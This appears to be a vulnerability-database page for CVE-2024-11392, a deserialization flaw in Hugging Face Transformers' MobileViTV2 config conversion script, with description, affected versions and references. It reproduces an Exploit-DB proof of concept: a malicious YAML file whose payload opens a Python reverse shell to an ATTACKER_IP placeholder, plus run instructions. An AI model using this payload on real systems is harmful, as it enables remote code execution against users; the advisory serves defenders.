CVE-2024-11392
Description
Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of configuration files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-24322.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392
# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.
# POC
# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"
# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or
# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| PyPI | transformers | <4.48.0 | 4.48.0 |
References
- https://nvd.nist.gov/vuln/detail/CVE-2024-11392
- https://github.com/huggingface/transformers/issues/34840
- https://github.com/huggingface/transformers/pull/35296
- https://github.com/huggingface/transformers
- https://github.com/pypa/advisory-database/tree/main/vulns/transformers/PYSEC-2024-227.yaml
- https://www.zerodayinitiative.com/advisories/ZDI-24-1513
- https://www.zerodayinitiative.com/advisories/ZDI-24-1513/
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.